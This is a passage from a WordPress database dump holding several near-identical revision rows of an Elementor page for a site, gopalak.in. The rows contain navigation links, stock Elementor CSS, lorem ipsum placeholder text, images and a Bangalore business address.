100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:25:19','2022-09-30 05:55:19','',1373,'https://gopalak.in/?p=1441',0,'revision','',0),(1442,1,'2022-09-30 11:25:19','2022-09-30 05:55:19','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:25:19','2022-09-30 05:55:19','',1373,'https://gopalak.in/?p=1442',0,'revision','',0),(1443,1,'2022-09-30 11:26:49','2022-09-30 05:56:49','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:26:49','2022-09-30 05:56:49','',1373,'https://gopalak.in/?p=1443',0,'revision','',0),(1444,1,'2022-09-30 11:26:49','2022-09-30 05:56:49','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:26:49','2022-09-30 05:56:49','',1373,'https://gopalak.in/?p=1444',0,'revision','',0),(1445,1,'2022-09-30 11:26:50','2022-09-30 05:56:50','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor 